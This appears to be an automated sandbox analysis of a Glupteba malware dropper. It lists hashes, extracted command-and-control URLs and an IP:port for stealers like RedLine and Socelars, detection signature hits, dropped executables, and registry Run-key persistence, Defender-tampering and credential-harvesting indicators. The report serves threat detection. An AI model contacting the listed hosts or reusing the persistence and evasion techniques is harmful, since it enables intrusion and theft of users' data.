glupteba | 3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b

Analysis

max time kernel
95s
max time network
161s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
11-03-2022 01:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe
Size

8.2MB
MD5

01061934aff7e788607c33a7ffae39c0
SHA1

0219fc8ea7fd5bbfca96313befc06d782585f50f
SHA256

3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b
SHA512

8db3ed695f0f7c597d30f98ad90f0c734e6b497498dffb7584f156ea99b140527dcecea8f9d378601265335d42751e239d9dc78d01f9aa60265f25881605b5e4

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

dadad123

86.107.197.196:63065

Attributes

auth_value
dd4834614a3ac04a7b90791c224626a2

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4960-182-0x0000000002E20000-0x0000000003747000-memory.dmp	family_glupteba
behavioral2/memory/4960-188-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba
behavioral2/memory/4720-209-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba
behavioral2/memory/4696-216-0x0000000003300000-0x0000000003C27000-memory.dmp	family_glupteba
behavioral2/memory/4696-217-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2752	4260	rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2564	4260	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 21 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4392-265-0x00000000004C0000-0x0000000000822000-memory.dmp	family_redline
behavioral2/memory/3888-272-0x0000000000540000-0x0000000000885000-memory.dmp	family_redline
behavioral2/memory/4392-278-0x00000000004C0000-0x0000000000822000-memory.dmp	family_redline
behavioral2/memory/4392-282-0x00000000004C0000-0x0000000000822000-memory.dmp	family_redline
behavioral2/memory/3888-283-0x0000000000540000-0x0000000000885000-memory.dmp	family_redline
behavioral2/memory/4392-290-0x00000000004C0000-0x0000000000822000-memory.dmp	family_redline
behavioral2/memory/1852-281-0x0000000000DF0000-0x0000000001135000-memory.dmp	family_redline
behavioral2/memory/1852-296-0x0000000000DF0000-0x0000000001135000-memory.dmp	family_redline
behavioral2/memory/3888-298-0x0000000000540000-0x0000000000885000-memory.dmp	family_redline
behavioral2/memory/3888-307-0x0000000000540000-0x0000000000885000-memory.dmp	family_redline
behavioral2/memory/1852-308-0x0000000000DF0000-0x0000000001135000-memory.dmp	family_redline
behavioral2/memory/3888-317-0x0000000000540000-0x0000000000885000-memory.dmp	family_redline
behavioral2/memory/1852-299-0x0000000000DF0000-0x0000000001135000-memory.dmp	family_redline
behavioral2/memory/3888-295-0x0000000000540000-0x0000000000885000-memory.dmp	family_redline
behavioral2/memory/1852-280-0x0000000000DF0000-0x0000000001135000-memory.dmp	family_redline
behavioral2/memory/1852-270-0x0000000000DF0000-0x0000000001135000-memory.dmp	family_redline
behavioral2/memory/932-256-0x0000000000900000-0x0000000000920000-memory.dmp	family_redline
C:\Users\Admin\Pictures\Adobe Films\roIzQCmDpKDxVktzv58tbBon.exe	family_redline
behavioral2/memory/4392-252-0x00000000004C0000-0x0000000000822000-memory.dmp	family_redline
C:\Users\Admin\Pictures\Adobe Films\roIzQCmDpKDxVktzv58tbBon.exe	family_redline
behavioral2/memory/4392-244-0x00000000004C0000-0x0000000000822000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 4420 created 4960 4420 svchost.exe Graphics.exe
PID 4420 created 4696 4420 svchost.exe csrss.exe
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata

description	pid	process	target process
PID 4420 created 4960	4420	svchost.exe	Graphics.exe
PID 4420 created 4696	4420	svchost.exe	csrss.exe

OnlyLogger Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/956-319-0x0000000000650000-0x0000000000694000-memory.dmp	family_onlylogger

Downloads MZ/PE file

Executes dropped EXE 45 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeGraphics.exeUpdbdate.exeInstall.exeFiles.exepub2.exeFile.exeFolder.exejfiag3g_gg.exejfiag3g_gg.exeGraphics.execsrss.exeinjector.exexeOr2IwkN6H_CsyE9rnxIde9.exe577ozCtS1we3ETR2TTV7uJro.exeSgX1XbXgWUaO_2LalK20rA6N.exeDNDlYi5RpG9RGgDXfJH56bSJ.exe8Q3zkbnXoy6BIlQTdaVfP3Q4.exeKCH3v59TQ6iq7ORLzU0vg3GI.exe32RzcO6lYPeqhnwRztu_jeK8.exe0lsxOdR_NT0afutaQTZG02lD.exeroIzQCmDpKDxVktzv58tbBon.exeRA0tv829vE9gUwMXg5jLTHZy.exe2IPrMHkAwJQJgyScNEogNnwF.exev7qCTe_5ROHvzrYexwJ3nCWA.exe9MzAOHnGUGbcBbuRRGTTf7zi.exejjOxcyQKi5W3IGIPRLbt1B1h.exeTFQPn58XpKhAgK5EckjP6uXJ.exeuUxEvdY_irQvso47SQc1mZ5P.exeInstall.exeOJ3gHl_HvK3bh4QO7iQQoEi8.exe68d5aaf5-a523-4775-bd2b-6c80210b5f1c.exe1H8HE.exeInstall.exeKD13E.exe4219M.exe4219M.exeIM186.exeMLHIL2HBLLDM48K.exeEsZV69eNw2aeJEDmXf9rFLO5.exeLfd3pjbM4UpOAI4yFoSv8bbQ.exeVVj8QUU2oOkclF9IV_D53J7E.exeEIBcenHYIk6WJIq8QtLD4EXP.exe

pid	process
3176	SoCleanInst.exe
1404	md9_1sjm.exe
4568	Folder.exe
4960	Graphics.exe
4860	Updbdate.exe
2812	Install.exe
2244	Files.exe
4720	pub2.exe
1336	File.exe
2012	Folder.exe
3036	jfiag3g_gg.exe
4012	jfiag3g_gg.exe
4720	Graphics.exe
4696	csrss.exe
2288	injector.exe
4424	xeOr2IwkN6H_CsyE9rnxIde9.exe
1284	577ozCtS1we3ETR2TTV7uJro.exe
3612	SgX1XbXgWUaO_2LalK20rA6N.exe
4392	DNDlYi5RpG9RGgDXfJH56bSJ.exe
956	8Q3zkbnXoy6BIlQTdaVfP3Q4.exe
3528	KCH3v59TQ6iq7ORLzU0vg3GI.exe
2192	32RzcO6lYPeqhnwRztu_jeK8.exe
4088	0lsxOdR_NT0afutaQTZG02lD.exe
932	roIzQCmDpKDxVktzv58tbBon.exe
1308	RA0tv829vE9gUwMXg5jLTHZy.exe
1232	2IPrMHkAwJQJgyScNEogNnwF.exe
2056	v7qCTe_5ROHvzrYexwJ3nCWA.exe
1852	9MzAOHnGUGbcBbuRRGTTf7zi.exe
3888	jjOxcyQKi5W3IGIPRLbt1B1h.exe
2672	TFQPn58XpKhAgK5EckjP6uXJ.exe
2100	uUxEvdY_irQvso47SQc1mZ5P.exe
4532	Install.exe
5096	OJ3gHl_HvK3bh4QO7iQQoEi8.exe
3492	68d5aaf5-a523-4775-bd2b-6c80210b5f1c.exe
4408	1H8HE.exe
5064	Install.exe
3712	KD13E.exe
1936	4219M.exe
4208	4219M.exe
3084	IM186.exe
4564	MLHIL2HBLLDM48K.exe
668	EsZV69eNw2aeJEDmXf9rFLO5.exe
1200	Lfd3pjbM4UpOAI4yFoSv8bbQ.exe
4108	VVj8QUU2oOkclF9IV_D53J7E.exe
3156	EIBcenHYIk6WJIq8QtLD4EXP.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Pictures\Adobe Films\32RzcO6lYPeqhnwRztu_jeK8.exe	upx
C:\Users\Admin\Pictures\Adobe Films\32RzcO6lYPeqhnwRztu_jeK8.exe	upx

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exeFolder.exeFile.exeRA0tv829vE9gUwMXg5jLTHZy.exe577ozCtS1we3ETR2TTV7uJro.exeOJ3gHl_HvK3bh4QO7iQQoEi8.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	3a7383493f9921503e1a6d9b1b54a00be040663571127bb5f9498ee2fb4fac7b.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	File.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	RA0tv829vE9gUwMXg5jLTHZy.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	577ozCtS1we3ETR2TTV7uJro.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	OJ3gHl_HvK3bh4QO7iQQoEi8.exe

Loads dropped DLL 3 IoCs

Processes:

rundll32.exeSgX1XbXgWUaO_2LalK20rA6N.exe

pid process

2232 rundll32.exe
3612 SgX1XbXgWUaO_2LalK20rA6N.exe
3612 SgX1XbXgWUaO_2LalK20rA6N.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2232	rundll32.exe
3612	SgX1XbXgWUaO_2LalK20rA6N.exe
3612	SgX1XbXgWUaO_2LalK20rA6N.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeGraphics.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PurpleGrass = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

200 api.db-ip.com
234 ipinfo.io
22 ip-api.com
111 api.db-ip.com
112 api.db-ip.com
194 ipinfo.io
107 ipinfo.io
108 ipinfo.io
237 api.db-ip.com
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
200	api.db-ip.com
234	ipinfo.io
22	ip-api.com
111	api.db-ip.com
112	api.db-ip.com
194	ipinfo.io
107	ipinfo.io
108	ipinfo.io
237	api.db-ip.com

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

Processes:

DNDlYi5RpG9RGgDXfJH56bSJ.exe9MzAOHnGUGbcBbuRRGTTf7zi.exejjOxcyQKi5W3IGIPRLbt1B1h.exeuUxEvdY_irQvso47SQc1mZ5P.exeKD13E.exe4219M.exe4219M.exe

pid	process
4392	DNDlYi5RpG9RGgDXfJH56bSJ.exe
1852	9MzAOHnGUGbcBbuRRGTTf7zi.exe
3888	jjOxcyQKi5W3IGIPRLbt1B1h.exe
2100	uUxEvdY_irQvso47SQc1mZ5P.exe
3712	KD13E.exe
1936	4219M.exe
4208	4219M.exe

Drops file in Program Files directory 2 IoCs

Processes:

577ozCtS1we3ETR2TTV7uJro.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	577ozCtS1we3ETR2TTV7uJro.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	577ozCtS1we3ETR2TTV7uJro.exe

Drops file in Windows directory 2 IoCs

Processes:

Graphics.exe

description ioc process

File opened for modification C:\Windows\rss Graphics.exe
File created C:\Windows\rss\csrss.exe Graphics.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\rss	Graphics.exe
File created	C:\Windows\rss\csrss.exe	Graphics.exe

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3560	4960	WerFault.exe	Graphics.exe
2792	4960	WerFault.exe	Graphics.exe
4528	4960	WerFault.exe	Graphics.exe
1632	2232	WerFault.exe	rundll32.exe
2484	4960	WerFault.exe	Graphics.exe
3952	4960	WerFault.exe	Graphics.exe
2436	4960	WerFault.exe	Graphics.exe
4768	4960	WerFault.exe	Graphics.exe
4220	4960	WerFault.exe	Graphics.exe
4684	4960	WerFault.exe	Graphics.exe
4080	4960	WerFault.exe	Graphics.exe
3804	4960	WerFault.exe	Graphics.exe
756	4960	WerFault.exe	Graphics.exe
484	4960	WerFault.exe	Graphics.exe
3672	4960	WerFault.exe	Graphics.exe
3716	4960	WerFault.exe	Graphics.exe
804	4960	WerFault.exe	Graphics.exe
624	4960	WerFault.exe	Graphics.exe
2840	4960	WerFault.exe	Graphics.exe
768	4960	WerFault.exe	Graphics.exe
2428	4960	WerFault.exe	Graphics.exe
3744	4960	WerFault.exe	Graphics.exe
4248	4720	WerFault.exe	Graphics.exe
4788	4720	WerFault.exe	Graphics.exe
932	4720	WerFault.exe	Graphics.exe
5096	4720	WerFault.exe	Graphics.exe
2360	4720	WerFault.exe	Graphics.exe
4452	4720	WerFault.exe	Graphics.exe
2224	4720	WerFault.exe	Graphics.exe
2684	4720	WerFault.exe	Graphics.exe
3444	4720	WerFault.exe	Graphics.exe
4424	4720	WerFault.exe	Graphics.exe
756	4720	WerFault.exe	Graphics.exe
3716	4720	WerFault.exe	Graphics.exe
4380	4720	WerFault.exe	Graphics.exe
404	4720	WerFault.exe	Graphics.exe
3020	4720	WerFault.exe	Graphics.exe
3504	4720	WerFault.exe	Graphics.exe
4516	4696	WerFault.exe	csrss.exe
1808	4696	WerFault.exe	csrss.exe
4424	4696	WerFault.exe	csrss.exe
3632	4696	WerFault.exe	csrss.exe
3228	4696	WerFault.exe	csrss.exe
3312	4696	WerFault.exe	csrss.exe
3672	4696	WerFault.exe	csrss.exe
4224	4696	WerFault.exe	csrss.exe
2792	4696	WerFault.exe	csrss.exe
4276	4696	WerFault.exe	csrss.exe
5060	4696	WerFault.exe	csrss.exe
4788	4696	WerFault.exe	csrss.exe
1988	4696	WerFault.exe	csrss.exe
4000	4696	WerFault.exe	csrss.exe
3888	4696	WerFault.exe	csrss.exe
3820	4696	WerFault.exe	csrss.exe
3176	4696	WerFault.exe	csrss.exe
3172	4696	WerFault.exe	csrss.exe
1992	4696	WerFault.exe	csrss.exe
3348	4696	WerFault.exe	csrss.exe
4292	4696	WerFault.exe	csrss.exe
4244	4696	WerFault.exe	csrss.exe
1588	4696	WerFault.exe	csrss.exe
4964	4696	WerFault.exe	csrss.exe
4648	4696	WerFault.exe	csrss.exe
1764	956	WerFault.exe	8Q3zkbnXoy6BIlQTdaVfP3Q4.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SgX1XbXgWUaO_2LalK20rA6N.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	SgX1XbXgWUaO_2LalK20rA6N.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	SgX1XbXgWUaO_2LalK20rA6N.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

220 schtasks.exe
4824 schtasks.exe
4168 schtasks.exe
5020 schtasks.exe
6064 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5980 timeout.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

3528 taskkill.exe
424 taskkill.exe
5188 taskkill.exe

pid	process
220	schtasks.exe
4824	schtasks.exe
4168	schtasks.exe
5020	schtasks.exe
6064	schtasks.exe

pid	process
5980	timeout.exe

pid	process
3528	taskkill.exe
424	taskkill.exe
5188	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Graphics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	Graphics.exe
